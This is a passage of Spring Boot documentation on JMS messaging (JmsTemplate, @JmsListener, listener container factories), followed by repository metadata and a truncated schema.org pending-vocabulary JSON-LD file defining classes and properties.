include::{docs-java}/messaging/jms/sending/MyBean.java[] ---- NOTE: {spring-framework-api}/jms/core/JmsMessagingTemplate.html[`JmsMessagingTemplate`] can be injected in a similar manner. If a `DestinationResolver` or a `MessageConverter` bean is defined, it is associated automatically to the auto-configured `JmsTemplate`. [[messaging.jms.receiving]] === Receiving a Message When the JMS infrastructure is present, any bean can be annotated with `@JmsListener` to create a listener endpoint. If no `JmsListenerContainerFactory` has been defined, a default one is configured automatically. If a `DestinationResolver`, a `MessageConverter`, or a `javax.jms.ExceptionListener` beans are defined, they are associated automatically with the default factory. By default, the default factory is transactional. If you run in an infrastructure where a `JtaTransactionManager` is present, it is associated to the listener container by default. If not, the `sessionTransacted` flag is enabled. In that latter scenario, you can associate your local data store transaction to the processing of an incoming message by adding `@Transactional` on your listener method (or a delegate thereof). This ensures that the incoming message is acknowledged, once the local transaction has completed. This also includes sending response messages that have been performed on the same JMS session. The following component creates a listener endpoint on the `someQueue` destination: [source,java,indent=0,subs="verbatim"] ---- include::{docs-java}/messaging/jms/receiving/MyBean.java[] ---- TIP: See {spring-framework-api}/jms/annotation/EnableJms.html[the Javadoc of `@EnableJms`] for more details. If you need to create more `JmsListenerContainerFactory` instances or if you want to override the default, Spring Boot provides a `DefaultJmsListenerContainerFactoryConfigurer` that you can use to initialize a `DefaultJmsListenerContainerFactory` with the same settings as the one that is auto-configured. For instance, the following example exposes another factory that uses a specific `MessageConverter`: [source,java,indent=0,subs="verbatim"] ---- include::{docs-java}/messaging/jms/receiving/custom/MyJmsConfiguration.java[] ---- Then you can use the factory in any `@JmsListener`-annotated method as follows: [source,java,indent=0,subs="verbatim"] ---- include::{docs-java}/messaging/jms/receiving/custom/MyBean.java[] ----
AsciiDoc
4
Cuiqingqiang/spring-boot
spring-boot-project/spring-boot-docs/src/docs/asciidoc/messaging/jms.adoc
[ "Apache-2.0" ]
{ "@context": { "rdf": "http://www.w3.org/1999/02/22-rdf-syntax-ns#", "rdfs": "http://www.w3.org/2000/01/rdf-schema#", "xsd": "http://www.w3.org/2001/XMLSchema#" }, "@graph": [ { "@id": "http://schema.org/textValue", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2108" }, "http://schema.org/category": "issue-2108", "http://schema.org/domainIncludes": { "@id": "http://schema.org/PronounceableText" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "Text value being annotated.", "rdfs:label": "textValue" }, { "@id": "http://schema.org/RefundTypeEnumeration", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "RefundTypeEnumeration enumerates several kinds of product return refund types.", "rdfs:label": "RefundTypeEnumeration", "rdfs:subClassOf": { "@id": "http://schema.org/Enumeration" } }, { "@id": "http://schema.org/UserReview", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1589" }, "http://schema.org/category": "issue-1589", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A review created by an end-user (e.g. consumer, purchaser, attendee etc.), in contrast with <a class=\"localLink\" href=\"http://schema.org/CriticReview\">CriticReview</a>.", "rdfs:label": "UserReview", "rdfs:subClassOf": { "@id": "http://schema.org/Review" } }, { "@id": "http://schema.org/ReturnFeesEnumeration", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "ReturnFeesEnumeration expresses policies for return fees.", "rdfs:label": "ReturnFeesEnumeration", "rdfs:subClassOf": { "@id": "http://schema.org/Enumeration" } }, { "@id": "http://schema.org/hasDefinedTerm", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/894" }, "http://schema.org/category": "issue-894", "http://schema.org/domainIncludes": { "@id": "http://schema.org/DefinedTermSet" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/DefinedTerm" }, "rdfs:comment": "A Defined Term contained in this term set.", "rdfs:label": "hasDefinedTerm", "rdfs:subPropertyOf": { "@id": "http://schema.org/hasPart" } }, { "@id": "http://schema.org/totalJobOpenings", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2329" }, "http://schema.org/category": "issue-2329", "http://schema.org/domainIncludes": { "@id": "http://schema.org/JobPosting" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Integer" }, "rdfs:comment": "The number of positions open for this job posting. Use a positive integer. Do not use if the number of positions is unclear or not known.", "rdfs:label": "totalJobOpenings" }, { "@id": "http://schema.org/MerchantReturnFiniteReturnWindow", "@type": "http://schema.org/MerchantReturnEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2288" }, "http://schema.org/category": "issue-2288", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "MerchantReturnFiniteReturnWindow: there is a finite window for product returns.", "rdfs:label": "MerchantReturnFiniteReturnWindow" }, { "@id": "http://schema.org/timeToComplete", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2289" }, "http://schema.org/category": "issue-2289", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalProgram" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Duration" }, "rdfs:comment": "The expected length of time to complete the program if attending full-time.", "rdfs:label": "timeToComplete" }, { "@id": "http://schema.org/variableMeasured", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1083" }, "http://schema.org/category": "issue-1083", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Dataset" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/PropertyValue" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "The variableMeasured property can indicate (repeated as necessary) the variables that are measured in some dataset, either described as text or as pairs of identifier and description using PropertyValue.", "rdfs:label": "variableMeasured" }, { "@id": "http://schema.org/floorLevel", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Accommodation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "The floor level for an <a class=\"localLink\" href=\"http://schema.org/Accommodation\">Accommodation</a> in a multi-storey building. Since counting\n systems <a href=\"https://en.wikipedia.org/wiki/Storey#Consecutive_number_floor_designations\">vary internationally</a>, the local system should be used where possible.", "rdfs:label": "floorLevel" }, { "@id": "http://schema.org/masthead", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1525", "http://schema.org/domainIncludes": { "@id": "http://schema.org/NewsMediaOrganization" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/CreativeWork" } ], "rdfs:comment": "For a <a class=\"localLink\" href=\"http://schema.org/NewsMediaOrganization\">NewsMediaOrganization</a>, a link to the masthead page or a page listing top editorial management.", "rdfs:label": "masthead", "rdfs:subPropertyOf": { "@id": "http://schema.org/publishingPrinciples" } }, { "@id": "http://schema.org/endOffset", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2021" }, "http://schema.org/category": "issue-2021", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Clip" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Number" }, "rdfs:comment": "The end time of the clip expressed as the number of seconds from the beginning of the work.", "rdfs:label": "endOffset" }, { "@id": "http://schema.org/competencyRequired", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1779" }, "http://schema.org/category": "issue-1779", "http://schema.org/domainIncludes": { "@id": "http://schema.org/EducationalOccupationalCredential" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/DefinedTerm" }, { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "Knowledge, skill, ability or personal attribute that must be demonstrated by a person or other entity.", "rdfs:label": "competencyRequired" }, { "@id": "http://schema.org/phoneticText", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2108" }, "http://schema.org/category": "issue-2108", "http://schema.org/domainIncludes": { "@id": "http://schema.org/PronounceableText" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "Representation of a text <a class=\"localLink\" href=\"http://schema.org/textValue\">textValue</a> using the specified <a class=\"localLink\" href=\"http://schema.org/speechToTextMarkup\">speechToTextMarkup</a>. For example the city name of Houston in IPA: /ˈhjuːstən/.", "rdfs:label": "phoneticText" }, { "@id": "http://schema.org/healthPlanMarketingUrl", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthInsurancePlan" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/URL" }, "rdfs:comment": "The URL that goes directly to the plan brochure for the specific standard plan or plan variation.", "rdfs:label": "healthPlanMarketingUrl" }, { "@id": "http://schema.org/schoolClosuresInfo", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2490" }, "http://schema.org/category": "issue-2490", "http://schema.org/domainIncludes": { "@id": "http://schema.org/SpecialAnnouncement" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/URL" }, { "@id": "http://schema.org/WebContent" } ], "rdfs:comment": "Information about school closures.", "rdfs:label": "schoolClosuresInfo" }, { "@id": "http://schema.org/PublicToilet", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1624" }, "http://schema.org/category": "issue-1624", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A public toilet is a room or small building containing one or more toilets (and possibly also urinals) which is available for use by the general public, or by customers or employees of certain businesses.", "rdfs:label": "PublicToilet", "rdfs:subClassOf": { "@id": "http://schema.org/CivicStructure" } }, { "@id": "http://schema.org/sdDatePublished", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1886" }, "http://schema.org/category": "issue-1886", "http://schema.org/domainIncludes": { "@id": "http://schema.org/CreativeWork" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Date" }, "rdfs:comment": "Indicates the date on which the current structured data was generated / published. Typically used alongside <a class=\"localLink\" href=\"http://schema.org/sdPublisher\">sdPublisher</a>", "rdfs:label": "sdDatePublished" }, { "@id": "http://schema.org/SymptomsHealthAspect", "@type": "http://schema.org/HealthAspectEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2374" }, "http://schema.org/category": "issue-2374", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Symptoms or related symptoms of a Topic.", "rdfs:label": "SymptomsHealthAspect" }, { "@id": "http://schema.org/OfflineEventAttendanceMode", "@type": "http://schema.org/EventAttendanceModeEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1842" }, "http://schema.org/category": "issue-1842", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "OfflineEventAttendanceMode - an event that is primarily conducted offline.", "rdfs:label": "OfflineEventAttendanceMode" }, { "@id": "http://schema.org/Recommendation", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2405" }, "http://schema.org/category": "issue-2405", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "<a class=\"localLink\" href=\"http://schema.org/Recommendation\">Recommendation</a> is a type of <a class=\"localLink\" href=\"http://schema.org/Review\">Review</a> that suggests or proposes something as the best option or best course of action. Recommendations may be for products or services, or other concrete things, as in the case of a ranked list or product guide. A <a class=\"localLink\" href=\"http://schema.org/Guide\">Guide</a> may list multiple recommendations for different categories. For example, in a <a class=\"localLink\" href=\"http://schema.org/Guide\">Guide</a> about which TVs to buy, the author may have several <a class=\"localLink\" href=\"http://schema.org/Recommendation\">Recommendation</a>s.", "rdfs:label": "Recommendation", "rdfs:subClassOf": { "@id": "http://schema.org/Review" } }, { "@id": "http://schema.org/partOfTrip", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#Tourism" }, "http://schema.org/category": "issue-1810", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Trip" }, "http://schema.org/inverseOf": { "@id": "http://schema.org/subTrip" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Trip" }, "rdfs:comment": "Identifies that this <a class=\"localLink\" href=\"http://schema.org/Trip\">Trip</a> is a subTrip of another Trip. For example Day 1, Day 2, etc. of a multi-day trip.", "rdfs:label": "partOfTrip" }, { "@id": "http://schema.org/AdvertiserContentArticle", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" } ], "http://schema.org/category": "issue-1525", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An <a class=\"localLink\" href=\"http://schema.org/Article\">Article</a> that an external entity has paid to place or to produce to its specifications. Includes <a href=\"https://en.wikipedia.org/wiki/Advertorial\">advertorials</a>, sponsored content, native advertising and other paid content.", "rdfs:label": "AdvertiserContentArticle", "rdfs:subClassOf": { "@id": "http://schema.org/Article" } }, { "@id": "http://schema.org/gender", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2341" }, "http://schema.org/category": "issue-2341", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Person" }, { "@id": "http://schema.org/SportsTeam" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/GenderType" }, { "@id": "http://schema.org/Text" } ], "rdfs:comment": "Gender of something, typically a <a class=\"localLink\" href=\"http://schema.org/Person\">Person</a>, but possibly also fictional characters, animals, etc. While http://schema.org/Male and http://schema.org/Female may be used, text strings are also acceptable for people who do not identify as a binary gender. The <a class=\"localLink\" href=\"http://schema.org/gender\">gender</a> property can also be used in an extended sense to cover e.g. the gender of sports teams. As with the gender of individuals, we do not try to enumerate all possibilities. A mixed-gender <a class=\"localLink\" href=\"http://schema.org/SportsTeam\">SportsTeam</a> can be indicated with a text value of \"Mixed\".", "rdfs:label": "gender" }, { "@id": "http://schema.org/hasDriveThroughService", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2490" }, "http://schema.org/category": "issue-2490", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Place" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Boolean" }, "rdfs:comment": "Indicates whether some facility (e.g. <a class=\"localLink\" href=\"http://schema.org/FoodEstablishment\">FoodEstablishment</a>, <a class=\"localLink\" href=\"http://schema.org/CovidTestingFacility\">CovidTestingFacility</a>) offers a service that can be used by driving through in a car. In the case of <a class=\"localLink\" href=\"http://schema.org/CovidTestingFacility\">CovidTestingFacility</a> such facilities could potentially help with social distancing from other potentially-infected users.", "rdfs:label": "hasDriveThroughService" }, { "@id": "http://schema.org/marginOfError", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2291" }, "http://schema.org/category": "issue-2291", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Observation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/DateTime" }, "rdfs:comment": "A marginOfError for an <a class=\"localLink\" href=\"http://schema.org/Observation\">Observation</a>.", "rdfs:label": "marginOfError" }, { "@id": "http://schema.org/fundedItem", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/383" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1950" } ], "http://schema.org/category": [ "issue-1688", "issue-383" ], "http://schema.org/domainIncludes": { "@id": "http://schema.org/Grant" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Thing" }, "rdfs:comment": "Indicates an item funded or sponsored through a <a class=\"localLink\" href=\"http://schema.org/Grant\">Grant</a>.", "rdfs:label": "fundedItem" }, { "@id": "http://schema.org/healthPlanPharmacyCategory", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthPlanCostSharingSpecification" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "The category or type of pharmacy associated with this cost sharing.", "rdfs:label": "healthPlanPharmacyCategory" }, { "@id": "http://schema.org/observedNode", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2291" }, "http://schema.org/category": "issue-2291", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Observation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/StatisticalPopulation" }, "rdfs:comment": "The observedNode of an <a class=\"localLink\" href=\"http://schema.org/Observation\">Observation</a>, often a <a class=\"localLink\" href=\"http://schema.org/StatisticalPopulation\">StatisticalPopulation</a>.", "rdfs:label": "observedNode" }, { "@id": "http://schema.org/AnalysisNewsArticle", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1525", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "An AnalysisNewsArticle is a <a class=\"localLink\" href=\"http://schema.org/NewsArticle\">NewsArticle</a> that, while based on factual reporting, incorporates the expertise of the author/producer, offering interpretations and conclusions.", "rdfs:label": "AnalysisNewsArticle", "rdfs:subClassOf": { "@id": "http://schema.org/NewsArticle" } }, { "@id": "http://schema.org/contactlessPayment", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/PaymentCard" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Boolean" }, "rdfs:comment": "A secure method for consumers to purchase products or services via debit, credit or smartcards by using RFID or NFC technology.", "rdfs:label": "contactlessPayment" }, { "@id": "http://schema.org/legislationTransposes", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://publications.europa.eu/mdr/eli/index.html" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Legislation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Legislation" }, "http://www.w3.org/2002/07/owl#equivalentProperty": { "@id": "http://data.europa.eu/eli/ontology#transposes" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#transposes" }, "rdfs:comment": "Indicates that this legislation (or part of legislation) fulfills the objectives set by another legislation, by passing appropriate implementation measures. Typically, some legislations of European Union's member states or regions transpose European Directives. This indicates a legally binding link between the 2 legislations.", "rdfs:label": "legislationTransposes", "rdfs:subPropertyOf": { "@id": "http://schema.org/legislationApplies" } }, { "@id": "http://schema.org/domiciledMortgage", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "http://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#FIBO" }, { "@id": "https://github.com/schemaorg/schemaorg/issues/1253" } ], "http://schema.org/category": "issue-1253", "http://schema.org/domainIncludes": { "@id": "http://schema.org/MortgageLoan" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Boolean" }, "rdfs:comment": "Whether borrower is a resident of the jurisdiction where the property is located.", "rdfs:label": "domiciledMortgage" }, { "@id": "http://schema.org/tourBookingPage", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/ApartmentComplex" }, { "@id": "http://schema.org/Accommodation" }, { "@id": "http://schema.org/Place" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/URL" }, "rdfs:comment": "A page providing information on how to book a tour of some <a class=\"localLink\" href=\"http://schema.org/Place\">Place</a>, such as an <a class=\"localLink\" href=\"http://schema.org/Accommodation\">Accommodation</a> or <a class=\"localLink\" href=\"http://schema.org/ApartmentComplex\">ApartmentComplex</a> in a real estate setting, as well as other kinds of tours as appropriate.", "rdfs:label": "tourBookingPage" }, { "@id": "http://schema.org/BackgroundNewsArticle", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1525" }, { "@id": "https://www.w3.org/wiki/WebSchemas/SchemaDotOrgSources#TP" } ], "http://schema.org/category": "issue-1525", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A <a class=\"localLink\" href=\"http://schema.org/NewsArticle\">NewsArticle</a> providing historical context, definition and detail on a specific topic (aka \"explainer\" or \"backgrounder\"). For example, an in-depth article or frequently-asked-questions (<a href=\"https://en.wikipedia.org/wiki/FAQ\">FAQ</a>) document on topics such as Climate Change or the European Union. Other kinds of background material from a non-news setting are often described using <a class=\"localLink\" href=\"http://schema.org/Book\">Book</a> or <a class=\"localLink\" href=\"http://schema.org/Article\">Article</a>, in particular <a class=\"localLink\" href=\"http://schema.org/ScholarlyArticle\">ScholarlyArticle</a>. See also <a class=\"localLink\" href=\"http://schema.org/NewsArticle\">NewsArticle</a> for related vocabulary from a learning/education perspective.", "rdfs:label": "BackgroundNewsArticle", "rdfs:subClassOf": { "@id": "http://schema.org/NewsArticle" } }, { "@id": "http://schema.org/benefitsSummaryUrl", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1062" }, "http://schema.org/category": "issue-1062", "http://schema.org/domainIncludes": { "@id": "http://schema.org/HealthInsurancePlan" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/URL" }, "rdfs:comment": "The URL that goes directly to the summary of benefits and coverage for the specific standard plan or plan variation.", "rdfs:label": "benefitsSummaryUrl" }, { "@id": "http://schema.org/leaseLength", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2373" }, "http://schema.org/category": "issue-2373", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/Accommodation" }, { "@id": "http://schema.org/Offer" }, { "@id": "http://schema.org/RealEstateListing" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Duration" }, { "@id": "http://schema.org/QuantitativeValue" } ], "rdfs:comment": "Length of the lease for some <a class=\"localLink\" href=\"http://schema.org/Accommodation\">Accommodation</a>, either particular to some <a class=\"localLink\" href=\"http://schema.org/Offer\">Offer</a> or in some cases intrinsic to the property.", "rdfs:label": "leaseLength" }, { "@id": "http://schema.org/legislationConsolidates", "@type": "rdf:Property", "http://purl.org/dc/terms/source": [ { "@id": "https://github.com/schemaorg/schemaorg/issues/1156" }, { "@id": "http://publications.europa.eu/mdr/eli/index.html" } ], "http://schema.org/category": "issue-1156", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Legislation" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Legislation" }, "http://www.w3.org/2002/07/owl#equivalentProperty": { "@id": "http://data.europa.eu/eli/ontology#consolidates" }, "http://www.w3.org/2004/02/skos/core#exactMatch": { "@id": "http://data.europa.eu/eli/ontology#consolidates" }, "rdfs:comment": "Indicates another legislation taken into account in this consolidated legislation (which is usually the product of an editorial process that revises the legislation). This property should be used multiple times to refer to both the original version or the previous consolidated version, and to the legislations making the change.", "rdfs:label": "legislationConsolidates" }, { "@id": "http://schema.org/RealEstateListing", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2348" }, "http://schema.org/category": "issue-2348", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "A <a class=\"localLink\" href=\"http://schema.org/RealEstateListing\">RealEstateListing</a> is a listing that describes one or more real-estate <a class=\"localLink\" href=\"http://schema.org/Offer\">Offer</a>s (whose <a class=\"localLink\" href=\"http://schema.org/businessFunction\">businessFunction</a> is typically to lease out, or to sell).\n The <a class=\"localLink\" href=\"http://schema.org/RealEstateListing\">RealEstateListing</a> type itself represents the overall listing, as manifested in some <a class=\"localLink\" href=\"http://schema.org/WebPage\">WebPage</a>.", "rdfs:label": "RealEstateListing", "rdfs:subClassOf": { "@id": "http://schema.org/WebPage" } }, { "@id": "http://schema.org/sport", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1951" }, "http://schema.org/category": "issue-1951", "http://schema.org/domainIncludes": [ { "@id": "http://schema.org/SportsEvent" }, { "@id": "http://schema.org/SportsOrganization" } ], "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": [ { "@id": "http://schema.org/Text" }, { "@id": "http://schema.org/URL" } ], "rdfs:comment": "A type of sport (e.g. Baseball).", "rdfs:label": "sport" }, { "@id": "http://schema.org/SheetMusic", "@type": "rdfs:Class", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1448" }, "http://schema.org/category": "issue-1448", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "Printed music, as opposed to performed or recorded music.", "rdfs:label": "SheetMusic", "rdfs:subClassOf": { "@id": "http://schema.org/CreativeWork" } }, { "@id": "http://schema.org/nsn", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2126" }, "http://schema.org/category": "issue-2126", "http://schema.org/domainIncludes": { "@id": "http://schema.org/Product" }, "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "http://schema.org/rangeIncludes": { "@id": "http://schema.org/Text" }, "rdfs:comment": "Indicates the <a href=\"https://en.wikipedia.org/wiki/NATO_Stock_Number\">NATO stock number</a> (nsn) of a <a class=\"localLink\" href=\"http://schema.org/Product\">Product</a>.", "rdfs:label": "nsn", "rdfs:subPropertyOf": { "@id": "http://schema.org/identifier" } }, { "@id": "http://schema.org/MissingContext", "@type": "http://schema.org/MediaManipulationRatingEnumeration", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/2450" }, "http://schema.org/category": "issue-2450", "http://schema.org/isPartOf": { "@id": "http://pending.schema.org" }, "rdfs:comment": "MissingContext: ...", "rdfs:label": "MissingContext" }, { "@id": "http://schema.org/linkRelationship", "@type": "rdf:Property", "http://purl.org/dc/terms/source": { "@id": "https://github.com/schemaorg/schemaorg/issues/1045" }, "http://schema.org/category": "issue-1045", "http://schema.org/domainIncludes": { "@id": "http://schema.org/LinkRole" }, 